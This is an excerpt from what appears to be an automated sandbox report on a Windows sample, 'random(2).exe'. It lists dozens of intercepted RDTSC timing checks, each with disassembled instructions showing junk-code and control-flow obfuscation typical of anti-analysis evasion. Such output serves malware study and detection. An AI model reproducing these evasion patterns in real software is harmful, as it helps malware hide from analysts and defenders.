                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B85C3 second address: 7B85D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F83146B40C6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B85D5 second address: 7B85E3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8314EA9186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B85E3 second address: 7B86C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov cx, di 0x0000000b push 00000000h 0x0000000d sub dword ptr [ebp+122D2D8Fh], edi 0x00000013 call 00007F83146B40C9h 0x00000018 jl 00007F83146B40D6h 0x0000001e push eax 0x0000001f push esi 0x00000020 jmp 00007F83146B40D2h 0x00000025 pop esi 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a pushad 0x0000002b jmp 00007F83146B40D1h 0x00000030 jmp 00007F83146B40CFh 0x00000035 popad 0x00000036 mov eax, dword ptr [eax] 0x00000038 jmp 00007F83146B40D5h 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 jmp 00007F83146B40D6h 0x00000046 pop eax 0x00000047 pushad 0x00000048 movzx eax, di 0x0000004b mov edx, esi 0x0000004d popad 0x0000004e push 00000003h 0x00000050 mov edi, ecx 0x00000052 push 00000000h 0x00000054 call 00007F83146B40D7h 0x00000059 add edi, 2AF3090Ah 0x0000005f pop edi 0x00000060 push 00000003h 0x00000062 sub dword ptr [ebp+122D2DB7h], eax 0x00000068 push 851B503Eh 0x0000006d ja 00007F83146B40D0h 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B86C3 second address: 7B8705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 xor dword ptr [esp], 451B503Eh 0x0000000e sbb si, 2EE7h 0x00000013 lea ebx, dword ptr [ebp+1244C24Ch] 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F8314EA9188h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 movsx edx, dx 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B8705 second address: 7B8714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B87C2 second address: 7B8806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 sub dword ptr [ebp+122D19BEh], edi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F8314EA9188h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov ecx, dword ptr [ebp+122D397Dh] 0x00000030 push C60C050Fh 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 jl 00007F8314EA9186h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B8806 second address: 7B8822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B8822 second address: 7B8826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B8826 second address: 7B88A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 39F3FB71h 0x00000011 mov ecx, 47217D8Bh 0x00000016 push 00000003h 0x00000018 mov esi, dword ptr [ebp+122D1FAEh] 0x0000001e sub edx, dword ptr [ebp+122D3A65h] 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D1A8Bh], eax 0x0000002c push 00000003h 0x0000002e or dword ptr [ebp+122D306Fh], edx 0x00000034 pushad 0x00000035 push edi 0x00000036 mov dword ptr [ebp+122D308Ah], esi 0x0000003c pop ebx 0x0000003d add ax, 02BBh 0x00000042 popad 0x00000043 call 00007F83146B40C9h 0x00000048 jne 00007F83146B40DCh 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F83146B40CDh 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B88A9 second address: 7B88BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8314EA918Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B88BD second address: 7B8942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F83146B40D8h 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007F83146B40CEh 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e ja 00007F83146B40CEh 0x00000024 pop eax 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F83146B40C8h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000017h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f xor esi, 399D2605h 0x00000045 lea ebx, dword ptr [ebp+1244C257h] 0x0000004b add esi, 5714BCAFh 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B8942 second address: 7B894D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B894D second address: 7B8951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D7FCB second address: 7D800A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F8314EA9199h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F8314EA918Eh 0x00000016 jnl 00007F8314EA918Eh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7A4623 second address: 7A463E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F83146B40C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7A463E second address: 7A4644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D61A2 second address: 7D61A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6562 second address: 7D6566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6566 second address: 7D6591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F83146B40D7h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6591 second address: 7D6597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D686F second address: 7D68B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jns 00007F83146B40C6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jng 00007F83146B40CAh 0x0000001e pushad 0x0000001f push eax 0x00000020 pop eax 0x00000021 jmp 00007F83146B40D6h 0x00000026 je 00007F83146B40C6h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6A25 second address: 7D6A2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6A2A second address: 7D6A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6A34 second address: 7D6A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F8314EA918Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jng 00007F8314EA919Eh 0x00000014 jno 00007F8314EA9188h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6BA2 second address: 7D6BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6BA8 second address: 7D6BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6BAC second address: 7D6BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6D08 second address: 7D6D0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D7156 second address: 7D7176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F83146B40D3h 0x0000000c jbe 00007F83146B40C6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D7895 second address: 7D78A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F8314EA9186h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D78A2 second address: 7D78A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D78A6 second address: 7D78AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D78AC second address: 7D78BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F83146B40CAh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D78BF second address: 7D78E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9197h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F8314EA9186h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D7E11 second address: 7D7E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F83146B40C6h 0x0000000a ja 00007F83146B40C6h 0x00000010 js 00007F83146B40C6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F83146B40D6h 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7DA275 second address: 7DA285 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8314EA9192h 0x00000008 js 00007F8314EA9186h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7DA285 second address: 7DA28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7DEB47 second address: 7DEB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7DEB4B second address: 7DEB4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7A95FC second address: 7A9603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E36E1 second address: 7E36E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E36E7 second address: 7E36F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E3874 second address: 7E3883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F83146B40CAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E3883 second address: 7E3888 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E3888 second address: 7E38A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007F83146B40C6h 0x00000012 pop ecx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E38A4 second address: 7E38A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A0A second address: 7E4A3D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F83146B40C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007F83146B40DEh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A3D second address: 7E4A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8314EA9186h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A4C second address: 7E4A5B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A5B second address: 7E4A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A61 second address: 7E4A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A65 second address: 7E4A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A69 second address: 7E4AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c je 00007F83146B40DEh 0x00000012 jo 00007F83146B40D8h 0x00000018 jmp 00007F83146B40D2h 0x0000001d pop eax 0x0000001e sub dword ptr [ebp+122D306Fh], esi 0x00000024 call 00007F83146B40C9h 0x00000029 jnc 00007F83146B40DCh 0x0000002f push eax 0x00000030 push ebx 0x00000031 jmp 00007F83146B40D7h 0x00000036 pop ebx 0x00000037 mov eax, dword ptr [esp+04h] 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e pushad 0x0000003f popad 0x00000040 pop eax 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4AE3 second address: 7E4B12 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8314EA9188h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F8314EA9193h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jo 00007F8314EA918Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4B12 second address: 7E4B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4E59 second address: 7E4E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA9196h 0x00000009 popad 0x0000000a jnp 00007F8314EA918Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E505D second address: 7E5067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F83146B40C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E56DD second address: 7E56EF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8314EA9186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E56EF second address: 7E56F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E56F4 second address: 7E5724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 mov di, dx 0x0000000b mov si, bx 0x0000000e nop 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007F8314EA9194h 0x00000016 pop ecx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E5A71 second address: 7E5A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E5C3E second address: 7E5C91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9198h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F8314EA9188h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 sub edi, dword ptr [ebp+122D3B6Dh] 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f jng 00007F8314EA918Ch 0x00000035 jl 00007F8314EA9186h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E61BA second address: 7E61C4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E61C4 second address: 7E624C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8314EA9193h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8314EA9190h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F8314EA9188h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c sub esi, dword ptr [ebp+122D3A09h] 0x00000032 push 00000000h 0x00000034 call 00007F8314EA9196h 0x00000039 add dword ptr [ebp+122D1CE9h], eax 0x0000003f pop esi 0x00000040 push 00000000h 0x00000042 call 00007F8314EA918Bh 0x00000047 pop edi 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jne 00007F8314EA9186h 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E624C second address: 7E6250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E6250 second address: 7E6256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E6256 second address: 7E6276 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F83146B40D5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E6276 second address: 7E627C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E6A4E second address: 7E6A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F83146B40C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E8572 second address: 7E85B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c js 00007F8314EA918Bh 0x00000012 push ecx 0x00000013 movsx esi, bx 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 movzx edi, ax 0x0000001c push 00000000h 0x0000001e jnc 00007F8314EA9187h 0x00000024 push eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E85B1 second address: 7E85BF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E85BF second address: 7E85C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E9051 second address: 7E90BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 jo 00007F83146B40D6h 0x0000000d jne 00007F83146B40D0h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F83146B40C8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e sub dword ptr [ebp+124465CFh], esi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F83146B40C8h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jne 00007F83146B40C6h 0x0000005c rdtsc
